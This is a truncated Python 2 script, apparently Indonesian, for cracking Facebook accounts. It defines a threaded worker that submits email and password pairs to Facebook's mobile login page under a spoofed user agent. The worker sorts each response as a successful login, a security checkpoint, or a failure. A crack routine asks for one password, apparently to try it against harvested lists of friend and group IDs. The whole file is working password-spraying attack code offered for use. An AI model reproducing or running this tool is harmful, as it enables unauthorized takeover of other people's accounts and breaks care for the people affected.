import platform,os,sys
def cetak(x,e=0):
	w = 'mhkbpcP'
	for i in w:
		j = w.index(i)
		x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
	x += '\033[0m'
	x = x.replace('!0','\033[0m')
	if e != 0:
		sys.stdout.write(x)
	else:
		sys.stdout.write(x+'\n')
if platform.python_version().split('.')[0] != '2':
	cetak('!m[!] Kamu menggunakan python versi %s silahkan menggunakan versi 2.x.x'%v().split(' ')[0])
	sys.exit()
import cookielib,re,urllib2,urllib,threading
try:
  import mechanize
except ImportError:
	cetak('!m[!] SepertiNya Module !cmechanize!m belum di install...\n!h[!] pip2 install mechanize')
	sys.exit()
br = 0
log = 0
id_bteman = []
id_bgroup = []
fid_bteman = []
fid_bgroup = []
class mt(threading.Thread):
	def __init__(self,i,p):
		threading.Thread.__init__(self)
		self.id = i
		self.a = 0
		self.p = p
	def update(self):
		return self.a,self.id
	def run(self):
		try:
			data = urllib2.urlopen(urllib2.Request(url='https://m.facebook.com/login.php',data=urllib.urlencode({'email':self.id,'pass':self.p}),headers={'User-Agent':'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16'}))
		except KeyboardInterrupt:
			sys.exit()
		except:
			self.a = 4
			sys.exit()
		if 'm_sess' in data.url or 'save-device' in data.url:
			self.a = 1
		elif 'checkpoint' in data.url:
			self.a = 2
		else:
			self.a = 3
def crack(d):
	while 1:
		s = inputD('[?] Sandi')
		if len(s) < 6:
			cetak('!m[!] Jumlah huruf minimal !k6')
		else:
			break
	return crack0(d,s)
def tam
